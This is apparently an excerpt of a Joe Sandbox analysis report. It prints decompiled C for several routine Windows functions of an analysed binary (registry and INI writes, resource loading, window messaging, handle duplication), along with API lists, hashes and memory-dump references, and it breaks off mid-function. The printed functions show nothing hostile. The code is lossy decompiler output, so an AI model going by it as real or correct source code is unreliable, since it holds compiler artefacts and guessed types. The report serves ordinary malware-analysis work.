                                                                                                                            • Opcode ID: db7d9ff110fce4a66f089e307071259c1497c372b414b02101496db43ce0e6c7
                                                                                                                            • Instruction ID: 9616742b8d21b1342c8bb16a792aa5e3345e6a1f117c4fb2633df10b48f2b342
                                                                                                                            • Opcode Fuzzy Hash: db7d9ff110fce4a66f089e307071259c1497c372b414b02101496db43ce0e6c7
                                                                                                                            • Instruction Fuzzy Hash: 522192B0800B408EC721AF7B8545246FBF8BFA4704F10892FD5AA97761C7B4A141DF49
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004046DB Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 94%
                                                                                                                            			E004046DB(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x441590; // 0x4917eadc
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E0041EBD6( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E00404695(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E0041D773(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                                                                                                                            0x004046db
                                                                                                                            0x004046e1
                                                                                                                            0x004046e8
                                                                                                                            0x004046ec
                                                                                                                            0x004046f0
                                                                                                                            0x004046f7
                                                                                                                            0x004046fa
                                                                                                                            0x0040473a
                                                                                                                            0x0040474b
                                                                                                                            0x004046fc
                                                                                                                            0x00404702
                                                                                                                            0x00404706
                                                                                                                            0x00404714
                                                                                                                            0x0040471b
                                                                                                                            0x0040471d
                                                                                                                            0x00404727
                                                                                                                            0x00404727
                                                                                                                            0x00404706
                                                                                                                            0x0040475f

                                                                                                                            APIs
                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00404714
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040471D
                                                                                                                            • _swprintf.LIBCMT ref: 0040473A
                                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040474B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4210924919-0
                                                                                                                            • Opcode ID: 6ca373592faffe28ebfdba870dafce4a7c66571e53b1ef07158055ffb4fac9e6
                                                                                                                            • Instruction ID: a1b436eb098f03be05b9dcf00d066055fdc1da87adfacf513202c34df4c24c03
                                                                                                                            • Opcode Fuzzy Hash: 6ca373592faffe28ebfdba870dafce4a7c66571e53b1ef07158055ffb4fac9e6
                                                                                                                            • Instruction Fuzzy Hash: 37019B72900209BBDB10EF658D45FAF77BCEF49715F10042AB611E7191D778ED048769
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403B53 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E00403B53(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E0040706D(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}















                                                                                                                            0x00403b56
                                                                                                                            0x00403b58
                                                                                                                            0x00403b5a
                                                                                                                            0x00403b5d
                                                                                                                            0x00403b5f
                                                                                                                            0x00403b61
                                                                                                                            0x00403b64
                                                                                                                            0x00403b99
                                                                                                                            0x00403b9b
                                                                                                                            0x00403b9e
                                                                                                                            0x00403ba5
                                                                                                                            0x00403bb7
                                                                                                                            0x00403bba
                                                                                                                            0x00403bbf
                                                                                                                            0x00403bbf
                                                                                                                            0x00403bba
                                                                                                                            0x00403bc9
                                                                                                                            0x00403bd3
                                                                                                                            0x00403bd3
                                                                                                                            0x00403bd9
                                                                                                                            0x00403bdc
                                                                                                                            0x00403be0
                                                                                                                            0x00403be0
                                                                                                                            0x00403b6b
                                                                                                                            0x00403b77
                                                                                                                            0x00403b7f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403b83
                                                                                                                            0x00403b8b
                                                                                                                            0x00403b8e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00403b97
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 00403B77
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 00403B83
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00403B91
                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 00403BBF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1078018258-0
                                                                                                                            • Opcode ID: b21a1369a86326d00e3335ea3dae7b5148f051b2119825fc1ba6cd8111b87bbf
                                                                                                                            • Instruction ID: 0593912dbfa7114e3495dd3dffbf02b492ce8b3ff3f331f7cf2505785b6fe815
                                                                                                                            • Opcode Fuzzy Hash: b21a1369a86326d00e3335ea3dae7b5148f051b2119825fc1ba6cd8111b87bbf
                                                                                                                            • Instruction Fuzzy Hash: 5E113D75600215EFDB118F56C848A9F7BB8EF05316F04807AF905A7291D779EE00DF64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040BD6E Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E0040BD6E(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v20;
				struct HWND__* _t17;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t28 = __edx;
				_t26 = __ecx;
				_t33 = __ecx;
				_push(__edi);
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					_t26 = __ecx;
					 *((intOrPtr*)( *__ecx + 0x170))();
				}
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E0040AAA8(0, _t26, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t27 = _t33;
				_t34 = E0040B451(_t27, SendMessageA);
				if(_t34 != 0) {
					SendMessageA( *(_t34 + 0x20), 0x1f, 0, 0);
					E0040AAA8(0, _t27, _t28,  *(_t34 + 0x20), 0x1f, 0, 0, 1, 1);
					_t17 = GetCapture();
					if(_t17 != 0) {
						_t17 = SendMessageA(_t17, 0x1f, 0, 0);
					}
					return _t17;
				} else {
					_push(_t27);
					_v20 = 0x4408f8;
					E00420866( &_v20, 0x43b8fc);
					asm("int3");
					_t20 = _t27;
					 *((intOrPtr*)(_t20 + 4)) = 1;
					return _t20;
				}
			}










                                                                                                                            0x0040bd6e
                                                                                                                            0x0040bd6e
                                                                                                                            0x0040bd70
                                                                                                                            0x0040bd74
                                                                                                                            0x0040bd7d
                                                                                                                            0x0040bd81
                                                                                                                            0x0040bd83
                                                                                                                            0x0040bd83
                                                                                                                            0x0040bd98
                                                                                                                            0x0040bda5
                                                                                                                            0x0040bdaa
                                                                                                                            0x0040bdb1
                                                                                                                            0x0040bdb5
                                                                                                                            0x0040bdc3
                                                                                                                            0x0040bdd0
                                                                                                                            0x0040bdd5
                                                                                                                            0x0040bddd
                                                                                                                            0x0040bde4
                                                                                                                            0x0040bde4
                                                                                                                            0x0040bde9
                                                                                                                            0x0040bdb7
                                                                                                                            0x0040d8b3
                                                                                                                            0x0040d8bd
                                                                                                                            0x0040d8c4
                                                                                                                            0x0040d8c9
                                                                                                                            0x0040d8ca
                                                                                                                            0x0040d8cc
                                                                                                                            0x0040d8d3
                                                                                                                            0x0040d8d3

                                                                                                                            APIs
                                                                                                                            • SendMessageA.USER32 ref: 0040BD98
                                                                                                                            • SendMessageA.USER32 ref: 0040BDC3
                                                                                                                              • Part of subcall function 0040AAA8: GetTopWindow.USER32(?), ref: 0040AAB6
                                                                                                                            • GetCapture.USER32 ref: 0040BDD5
                                                                                                                            • SendMessageA.USER32 ref: 0040BDE4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$CaptureWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 729421689-0
                                                                                                                            • Opcode ID: fdc2ae83c1ac4235d2b6ba99d938d980a906c580b7d116f2ec10a3c4225c9898
                                                                                                                            • Instruction ID: 02b7e4f30f77d81136f5aab352d4b9a5f0cca86758cef1d1a8caa950af1fe80b
                                                                                                                            • Opcode Fuzzy Hash: fdc2ae83c1ac4235d2b6ba99d938d980a906c580b7d116f2ec10a3c4225c9898
                                                                                                                            • Instruction Fuzzy Hash: 120184B13102187FF6313B648CC9FBB76ADEF4C789F010039F681B61E2C6A94C005A68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041318C Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 53%
                                                                                                                            			E0041318C(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E004070B9( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E00406890();
				}
				return 0;
			}







                                                                                                                            0x00413193
                                                                                                                            0x0041319f
                                                                                                                            0x004131a8
                                                                                                                            0x004131cb
                                                                                                                            0x004131d8
                                                                                                                            0x004131aa
                                                                                                                            0x004131b5
                                                                                                                            0x004131b6
                                                                                                                            0x004131b7
                                                                                                                            0x004131b8
                                                                                                                            0x004131ba
                                                                                                                            0x004131ea
                                                                                                                            0x004131ff
                                                                                                                            0x004131ff
                                                                                                                            0x0041320a
                                                                                                                            0x0041320c
                                                                                                                            0x0041320f
                                                                                                                            0x00413211
                                                                                                                            0x00413211
                                                                                                                            0x00413219

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3354205298-0
                                                                                                                            • Opcode ID: 4a23ed19dbb8242174122c7f99a0472083068e341f0c3c556a91a09fa851d0ae
                                                                                                                            • Instruction ID: e8b1558421fd21d99fbf6369d629ba2d8cf9c024235a99cfb605e9ac052a60a3
                                                                                                                            • Opcode Fuzzy Hash: 4a23ed19dbb8242174122c7f99a0472083068e341f0c3c556a91a09fa851d0ae
                                                                                                                            • Instruction Fuzzy Hash: BF11FE7290011AEBCF01DF95C849EDEBBB9BF04316F0080A6FA05A6111D775A6558B65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00418A19 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E00418A19(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E00402521(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E004189FC(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E0041A105(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}















                                                                                                                            0x00418a1c
                                                                                                                            0x00418a21
                                                                                                                            0x00418a2b
                                                                                                                            0x00418a38
                                                                                                                            0x00418a38
                                                                                                                            0x00418a2d
                                                                                                                            0x00418a34
                                                                                                                            0x00418a34
                                                                                                                            0x00418a4b
                                                                                                                            0x00418a54
                                                                                                                            0x00418a5c
                                                                                                                            0x00418a5d
                                                                                                                            0x00418a61
                                                                                                                            0x00418a69
                                                                                                                            0x00418a69
                                                                                                                            0x00418a76
                                                                                                                            0x00418a76
                                                                                                                            0x00418a7e
                                                                                                                            0x00418a84
                                                                                                                            0x00418a8c

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00402521: _malloc.LIBCMT ref: 0040253B
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00418A4B
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00418A54
                                                                                                                            • GetLastError.KERNEL32(?), ref: 00418A6F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3704204646-0
                                                                                                                            • Opcode ID: 5f54d64cbe7e87de9e65615120c8b6e2d3f0bb28953a03621c357e384d7e410e
                                                                                                                            • Instruction ID: 91a1e3f6ab10d1c9a6365c978849f860477091e42c06137dd0ddaeff27d3801e
                                                                                                                            • Opcode Fuzzy Hash: 5f54d64cbe7e87de9e65615120c8b6e2d3f0bb28953a03621c357e384d7e410e
                                                                                                                            • Instruction Fuzzy Hash: 91018471700204BFDB109BA6DD49F9B7BA8EF84755F14802AFA09CB281DB75DC408768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405540 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 94%
                                                                                                                            			E00405540(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* _t16;
				int _t17;
				int _t18;
				intOrPtr _t25;
				void* _t27;
				intOrPtr _t34;
				void* _t36;

				_t36 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					if( *((intOrPtr*)(__ecx + 0x14)) == 0) {
						L3:
						_t17 = E0040D8B0(_t25);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t36 + 0x18)) = 1;
						return _t18;
					}
					if(_a4 == 0) {
						_t34 =  *((intOrPtr*)(__ecx + 0x14));
						if(GetFocus() ==  *(_t34 + 0x20)) {
							SendMessageA( *(E0040A17C(0, _t27, __ebp, GetParent( *(_t34 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E0040CF5B( *((intOrPtr*)(_t36 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}











                                                                                                                            0x00405542
                                                                                                                            0x00405544
                                                                                                                            0x0040554b
                                                                                                                            0x00405583
                                                                                                                            0x0040555a
                                                                                                                            0x0040555a
                                                                                                                            0x0040555f
                                                                                                                            0x00405565
                                                                                                                            0x00405578
                                                                                                                            0x004055c3
                                                                                                                            0x004055c3
                                                                                                                            0x00000000
                                                                                                                            0x004055c3
                                                                                                                            0x00405589
                                                                                                                            0x0040558c
                                                                                                                            0x00405598
                                                                                                                            0x004055b0
                                                                                                                            0x004055b0
                                                                                                                            0x004055b6
                                                                                                                            0x004055be
                                                                                                                            0x00000000
                                                                                                                            0x004055be
                                                                                                                            0x00405550
                                                                                                                            0x00405552
                                                                                                                            0x00405558
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405558
                                                                                                                            0x004055cc

                                                                                                                            APIs
                                                                                                                            • EnableMenuItem.USER32 ref: 00405578
                                                                                                                              • Part of subcall function 0040D8B0: __CxxThrowException@8.LIBCMT ref: 0040D8C4
                                                                                                                            • GetFocus.USER32 ref: 0040558F
                                                                                                                            • GetParent.USER32(?), ref: 0040559D
                                                                                                                            • SendMessageA.USER32 ref: 004055B0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4211600527-0
                                                                                                                            • Opcode ID: c64665658e25b8023178406f94aa6c8c1b6ba60dd8f68d09bc653a037ac15c85
                                                                                                                            • Instruction ID: 44cb12e4db9536ae75da2a1f34344a2700648925ca342462969f40bd7d82f633
                                                                                                                            • Opcode Fuzzy Hash: c64665658e25b8023178406f94aa6c8c1b6ba60dd8f68d09bc653a037ac15c85
                                                                                                                            • Instruction Fuzzy Hash: 251152B1510A01FFDB21AF60DC8882BBBF6FF94316B10CA3EF156625A5C734AC458E59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AAA8 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 78%
                                                                                                                            			E0040AAA8(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				struct HWND__* _t26;

				_t24 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t25 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t26 = _t16;
					if(_t26 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t26, _a8, _a12, _a16);
					} else {
						_t20 = E0040A1A3(_t22, _t24, _t25, _t26, __eflags, _t26);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E0040A7CD(_t22, _t25, _t26, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t26);
						__eflags = _t18;
						if(_t18 != 0) {
							E0040AAA8(_t22, _t23, _t24, _t26, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t26, 2);
				}
				return _t16;
			}














                                                                                                                            0x0040aaa8
                                                                                                                            0x0040aaa8
                                                                                                                            0x0040aaa8
                                                                                                                            0x0040aab0
                                                                                                                            0x0040aab6
                                                                                                                            0x0040ab19
                                                                                                                            0x0040ab19
                                                                                                                            0x0040ab1d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040aaba
                                                                                                                            0x0040aabe
                                                                                                                            0x0040aae8
                                                                                                                            0x0040aac0
                                                                                                                            0x0040aac1
                                                                                                                            0x0040aac6
                                                                                                                            0x0040aac8
                                                                                                                            0x0040aaca
                                                                                                                            0x0040aacd
                                                                                                                            0x0040aad0
                                                                                                                            0x0040aad3
                                                                                                                            0x0040aad6
                                                                                                                            0x0040aad7
                                                                                                                            0x0040aad7
                                                                                                                            0x0040aac8
                                                                                                                            0x0040aaee
                                                                                                                            0x0040aaf2
                                                                                                                            0x0040aaf5
                                                                                                                            0x0040aaf7
                                                                                                                            0x0040aaf9
                                                                                                                            0x0040ab0b
                                                                                                                            0x0040ab0b
                                                                                                                            0x0040aaf9
                                                                                                                            0x0040ab13
                                                                                                                            0x0040ab13
                                                                                                                            0x0040ab22

                                                                                                                            APIs
                                                                                                                            • GetTopWindow.USER32(?), ref: 0040AAB6
                                                                                                                            • GetTopWindow.USER32(00000000), ref: 0040AAF5
                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 0040AB13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2353593579-0
                                                                                                                            • Opcode ID: ba4495cee95a16ea41d04dbc081b20f0c44998ab3bbb3295fa2aaa3f8be38deb
                                                                                                                            • Instruction ID: c6f682b5010e6ceb18e9f8d82a7d3acd2ea3d80a8fc054dca27b8e14ebc907fd
                                                                                                                            • Opcode Fuzzy Hash: ba4495cee95a16ea41d04dbc081b20f0c44998ab3bbb3295fa2aaa3f8be38deb
                                                                                                                            • Instruction Fuzzy Hash: A801ED32100619BBCF12AF519D04E9F3B2AAF54351F044025FA14651A1C73AD971EFAA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A467 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E0040A467(void* __ebx, void* __ecx, void* __edx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;
				void* _t19;

				_t15 = __edx;
				_t14 = __ecx;
				_t13 = __ebx;
